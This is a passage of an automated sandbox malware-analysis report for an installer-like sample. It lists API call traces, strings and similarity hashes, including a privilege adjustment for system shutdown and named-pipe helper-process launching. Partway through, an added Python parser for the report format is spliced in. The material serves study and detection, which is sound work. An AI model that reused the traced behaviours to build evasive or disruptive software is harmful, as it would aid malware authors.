                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: allocator
                                                                                    • String ID:
                                                                                    • API String ID: 3447690668-0
                                                                                    • Opcode ID: 817b939fb322faf8aa4a8908d91c84128208cf71eecda2aa4e4aa1b252350f97
                                                                                    • Instruction ID: 49106881f87acc91c15ffb423cd80b113fa76448b9a27e8f77458942fb597c13
                                                                                    • Opcode Fuzzy Hash: 817b939fb322faf8aa4a8908d91c84128208cf71eecda2aa4e4aa1b252350f97
                                                                                    • Instruction Fuzzy Hash: 7EC0927425820CAB8B08DF88E891C6973ADEB89650B008169BC0E8B352CE30BD40CA9D
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 31276548-0
                                                                                    • Opcode ID: 899fa9c962831e78d20aa585cacba709b3b6a16b28d6df11c32fd39be051b51c
                                                                                    • Instruction ID: 47ab257af6e364695ea890f9b43c82e37ccfc4e8ddd737aab863078b62403aa0
                                                                                    • Opcode Fuzzy Hash: 899fa9c962831e78d20aa585cacba709b3b6a16b28d6df11c32fd39be051b51c
                                                                                    • Instruction Fuzzy Hash: 0DA012108084001AC404BB194C4340F39C45941514FC40264745CB56C2E61A866403DB
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: send
                                                                                    • String ID:
                                                                                    • API String ID: 2809346765-0
                                                                                    • Opcode ID: f5630145063bab356e7fb3726eeaa839f6df9b7befddfe279059b26bdf28bc06
                                                                                    • Instruction ID: 36c17b40a1917c3e0e977767f4fd81cea8de6f80ba72861d125d2528aaa677a0
                                                                                    • Opcode Fuzzy Hash: f5630145063bab356e7fb3726eeaa839f6df9b7befddfe279059b26bdf28bc06
                                                                                    • Instruction Fuzzy Hash: 8B9002286C4561AB52140921684865B26A455056513457814D403D0401D6208258A555
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,-00000004,000000BF,00404283,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD), ref: 00403C83
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: d39b22df79555fe4438253863038b616525278bed3867586134d7713ba648576
                                                                                    • Instruction ID: f9c7199d2a20b3d4535cb586bdcc75df61911083c239a6e183f6db4c37c8fba7
                                                                                    • Opcode Fuzzy Hash: d39b22df79555fe4438253863038b616525278bed3867586134d7713ba648576
                                                                                    • Instruction Fuzzy Hash: EBF0A9F2B003214FE714DFB89E41702BBEAE748355F11427EE989EB798D7B09901A784
                                                                                    APIs
                                                                                    • Sleep.KERNEL32 ref: 02715EB2
                                                                                      • Part of subcall function 02716F17: _malloc.LIBCMT ref: 02716F31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep_malloc
                                                                                    • String ID:
                                                                                    • API String ID: 617756273-0
                                                                                    • Opcode ID: b28fdf1a708a3e8e5ae28ab42cd171088da65a45203389186fda3c0a6aa4cd98
                                                                                    • Instruction ID: 1ca814b2acf3c39bd239bc5342026ac889617992cae6f9d08fdb1acab8e56e73
                                                                                    • Opcode Fuzzy Hash: b28fdf1a708a3e8e5ae28ab42cd171088da65a45203389186fda3c0a6aa4cd98
                                                                                    • Instruction Fuzzy Hash: 48D012F2D04227DBE7B16DB448D813E61726B50244F958536D60BA6900D6754E5CC7D3
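The function-similarity entries above all share one plain-text layout (an APIs list, a Memory Dump Source block, the Joe Sandbox IDA Plugin snapshot, and a Similarity block with API ID, Opcode ID and fuzzy hashes). The parser below is an added example and is not part of the Joe Sandbox report or its tooling; it assumes that layout as it appears in this report, splits an export into one record per APIs block, strips the "Download File" link text that the web export leaves on Associated lines, and decodes the first four arguments of a logged VirtualAlloc call with the standard winnt.h constants so that allocations with an executable protection stand out. The sample input is constructed by splicing lines from entries in this report (the DeleteFileA function of the 0x10000000 module, the VirtualAlloc function of the 0x400000 image, and one "Part of subcall function" line from the Sleep entry), with the VirtualAlloc argument list shortened.

```python
"""Parse Joe Sandbox function-similarity blocks (APIs / Memory Dump Source /
Joe Sandbox IDA Plugin / Similarity) from a plain-text report export.
Added example, not Joe Sandbox code; the layout is taken from this report."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample spliced from entries in this report (DeleteFileA in the
# 0x10000000 module, VirtualAlloc in the 0x400000 image, one "Part of subcall"
# line from the Sleep entry); the VirtualAlloc argument list is shortened.
SAMPLE = """\
APIs
• DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: DeleteFile
• Opcode ID: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
• Instruction Fuzzy Hash: 5BC02B7520471C57AF808EE4BC448CB33ECD7095C33004000FE0CCB100C532E7019B60
APIs
• VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,-00000004,000000BF), ref: 00403C83
  • Part of subcall function 02716F17: _malloc.LIBCMT ref: 02716F31
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AllocVirtual
• Opcode ID: d39b22df79555fe4438253863038b616525278bed3867586134d7713ba648576
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<name>\w+)"
                    r"\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SRC_RE = re.compile(r"^(?P<file>\S+), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
META_KEYS = {"Snapshot File", "API ID", "String ID", "API String ID", "Opcode ID",
             "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}
# winnt.h constants used to annotate logged VirtualAlloc arguments
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x100000: "MEM_TOP_DOWN"}
PAGE_PROT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXEC_PROT = {0x10, 0x20, 0x40, 0x80}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                         # hex strings as logged; "?" = unknown
    ref: int                           # call-site address
    subcall_of: Optional[int] = None   # set for "Part of subcall function" lines

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    associated: list = field(default_factory=list)
    source_file: str = ""
    image_base: int = 0
    based_on_pe: bool = False
    meta: dict = field(default_factory=dict)   # API ID, Opcode ID, fuzzy hashes, ...

def parse_entries(text: str) -> list:
    """One FunctionEntry per 'APIs' block; a leading partial entry is skipped."""
    entries, cur, section = [], None, None
    for line in filter(None, (ln.strip() for ln in text.splitlines())):
        if line in SECTIONS:
            if line == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            if m := API_RE.match(line):
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                sub = int(m["sub"], 16) if m["sub"] else None
                cur.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), sub))
            continue
        if not (kv := KV_RE.match(line)):
            continue
        key, val = kv["key"].strip(), kv["val"].strip()
        if key == "Source File" and (s := SRC_RE.match(val)):
            cur.source_file, cur.image_base = s["file"], int(s["base"], 16)
            cur.based_on_pe = s["pe"] == "true"
        elif key == "Associated":
            cur.associated.append(re.sub(r"Download File$", "", val))  # web link residue
        elif key in META_KEYS:
            cur.meta[key] = val
    return entries

def describe_virtualalloc(call: ApiCall) -> dict:
    """Decode lpAddress, dwSize, flAllocationType, flProtect from a logged
    VirtualAlloc; trailing logged values are stack noise and are ignored."""
    if call.name != "VirtualAlloc" or len(call.args) < 4 or "?" in call.args[:4]:
        return {}
    addr, size, alloc, prot = (int(a, 16) for a in call.args[:4])
    flags = [n for bit, n in MEM_FLAGS.items() if alloc & bit] or [hex(alloc)]
    return {"address": addr, "size": size, "alloc": "|".join(flags),
            "protect": PAGE_PROT.get(prot, hex(prot)), "executable": prot in EXEC_PROT}
```

Run on the VirtualAlloc entry above, the decoder reports a 0x13FFF0-byte MEM_COMMIT allocation with PAGE_READWRITE protection, i.e. not directly executable; the Opcode ID and Instruction Fuzzy Hash values the parser collects are the fields to pivot on when comparing functions across reports.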
                                                                                    APIs
                                                                                    • IsIconic.USER32 ref: 0063E5C1
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0063E5DE
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0063E603
                                                                                      • Part of subcall function 005963F8: IsWindow.USER32 ref: 00596406
                                                                                      • Part of subcall function 005963F8: EnableWindow.USER32(?,000000FF,?,00000000,?,0063E71C,0063E737,0063E74D,?,?,000000EC,?,000000F0,?,00000000,?), ref: 00596415
                                                                                    • GetActiveWindow.USER32(00000000,0063E74D,?,?,000000EC,?,000000F0,?,00000000,?,00000000), ref: 0063E6CF
                                                                                    • SetActiveWindow.USER32(0065C5D1,0063E737,0063E74D,?,?,000000EC,?,000000F0,?,00000000,?,00000000), ref: 0063E720
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$EnableIconic
                                                                                    • String ID: D.S$Dc$`$qc
                                                                                    • API String ID: 4222481217-1700508051
                                                                                    • Opcode ID: 105bf1b043794c7febb61f28ddb640e4e5e1409b569c658a6f2acf29d1ee32be
                                                                                    • Instruction ID: a68385297073a1787c46507cafb47a44eecf45f015a0fdb6403bc58eaa920278
                                                                                    • Opcode Fuzzy Hash: 105bf1b043794c7febb61f28ddb640e4e5e1409b569c658a6f2acf29d1ee32be
                                                                                    • Instruction Fuzzy Hash: 64518C74A00249AFDB00DFA9C885ADEBBF6FB09314F154169F804EB391D776A941CFA0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,0041AD90,?,?), ref: 0040C2BD
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040C2CE
                                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3CE
                                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3E0
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3EC
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C431
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                    • API String ID: 1930782624-3908791685
                                                                                    • Opcode ID: c34afadf3db2e7f96e5d8f57f2f71db68a35707ef3791a46efc30f5c96551beb
                                                                                    • Instruction ID: 129811935084e97536274d2d3cc39016278ad45ca87abc2192b8d5c1b695ba56
                                                                                    • Opcode Fuzzy Hash: c34afadf3db2e7f96e5d8f57f2f71db68a35707ef3791a46efc30f5c96551beb
                                                                                    • Instruction Fuzzy Hash: 8841A471E00518DBCB10EBA4C8C5ADE73B5AF44310F5586BAD504F73C1E778AE458A8D
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 005FA9B8
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005FA9BE
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 005FA9D7
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 005FA9FE
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 005FAA03
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 005FAA14
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 107509674-3733053543
                                                                                    • Opcode ID: 85845749144dc9ce82d9e1a4bab315e58eda8b3d9d64f424d5201a4268532a52
                                                                                    • Instruction ID: 775351c24a523f7ca86ab9856cb2a99195e947980098857579868bc878f92e5d
                                                                                    • Opcode Fuzzy Hash: 85845749144dc9ce82d9e1a4bab315e58eda8b3d9d64f424d5201a4268532a52
                                                                                    • Instruction Fuzzy Hash: D9F062B068430675E610E6718E07FBE2588AB40B48F900C1AF789E50D2E7ADD4588677
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A,?,00000000,00000000,00000000), ref: 006507A5
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 00650828
                                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,00650864,?,00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A), ref: 00650840
                                                                                    • FindClose.KERNEL32(000000FF,0065086B,00650864,?,00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A), ref: 0065085E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                                    • String ID: isRS-$isRS-???.tmp
                                                                                    • API String ID: 134685335-3422211394
                                                                                    • Opcode ID: be8c0e228b3abfe7e50919e35dd7b0217464954728c07ec5518a4ebc0377dcf2
                                                                                    • Instruction ID: 7e40c14d5cf5c67ddc04c5ae91bd146497d11b7686551e4e99c720dcad4bb53e
                                                                                    • Opcode Fuzzy Hash: be8c0e228b3abfe7e50919e35dd7b0217464954728c07ec5518a4ebc0377dcf2
                                                                                    • Instruction Fuzzy Hash: 4F319471A0061C9FEF10EB65CC45ADEB7F9EB88305F5145FAE804B3291EA389E84CE54
                                                                                    APIs
                                                                                    • IsIconic.USER32 ref: 005B2661
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 005B267E
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005B26A3
                                                                                    • GetActiveWindow.USER32(?,000000EC,?,000000F0,?,00000000,005B2742,?,?,00000000), ref: 005B26B1
                                                                                    • MessageBoxW.USER32 ref: 005B26DE
                                                                                    • SetActiveWindow.USER32(?,005B270C,-0000002D,00000000,005B2705,?,?,000000EC,?,000000F0,?,00000000,005B2742,?,?,00000000), ref: 005B26FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$IconicMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1633107849-0
                                                                                    • Opcode ID: 358b33491ddebdf2595299d0a193073ac980c33294565c75b2cc6163bf35f257
                                                                                    • Instruction ID: 0959946ea7ea2d423f2b07d1ac2efebd9c7287cb6bf5dae26c143587a2194954
                                                                                    • Opcode Fuzzy Hash: 358b33491ddebdf2595299d0a193073ac980c33294565c75b2cc6163bf35f257
                                                                                    • Instruction Fuzzy Hash: 89318B34A04605AFDB00EFA9DD86EDE7BE9FB49350F5045A5F410E73A1DA78AD00DB24
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 0061A7D4
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,0061AA67,?,?,?,00000000,?,0061B466,?,?,00000000), ref: 0061A7DD
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A7E7
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000,0061AA67,?,?,?,00000000,?,0061B466,?,?,00000000), ref: 0061A7F0
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A866
                                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A874
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00661F70,00000003,00000000,00000000,00000000,0061AA23,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 0061A8BC
                                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0061AA12,?,00000000,C0000000,00000000,00661F70,00000003,00000000,00000000,00000000,0061AA23), ref: 0061A8F5
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                    • CreateProcessW.KERNEL32 ref: 0061A99E
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0061A9D4
                                                                                    • CloseHandle.KERNEL32(000000FF,0061AA19,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0061AA0C
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                    • API String ID: 770386003-3271284199
                                                                                    • Opcode ID: 8b417e6bfe7b416bc203fcebf180cb54b99f1040917cd1cd9b5e41bc12d13ce3
                                                                                    • Instruction ID: 3503b57a197a75d7cee75c72a57885d42cb6c05f4df10585553db908d6458071
                                                                                    • Opcode Fuzzy Hash: 8b417e6bfe7b416bc203fcebf180cb54b99f1040917cd1cd9b5e41bc12d13ce3
                                                                                    • Instruction Fuzzy Hash: 94713270A003499FEB10DFA9CC45BEEBBF5AB05704F1445A9F508EB392D7749980CB66
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B128A
                                                                                    • GetVersion.KERNEL32(00000000,005B1433,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B12A7
                                                                                    • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005B1433,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B12C1
                                                                                    • FreeSid.ADVAPI32(00000000,005B143A,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B142D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateFreeHandleInitializeModuleVersion
                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                    • API String ID: 4173726493-1888249752
                                                                                    • Opcode ID: 952df93399f65c742f00ad26f12ea1d2db98546042352c41d8bfdd11bcdf1fbe
                                                                                    • Instruction ID: ac35d0f59487471c61e1a1342d4049f29feb693cc75a8e69d60280a94490ce98
                                                                                    • Opcode Fuzzy Hash: 952df93399f65c742f00ad26f12ea1d2db98546042352c41d8bfdd11bcdf1fbe
                                                                                    • Instruction Fuzzy Hash: 7C519671A44705AADF51DBE58C62BFF7BE8FF05344F90082AFA00E7191E638E9408769
                                                                                    APIs
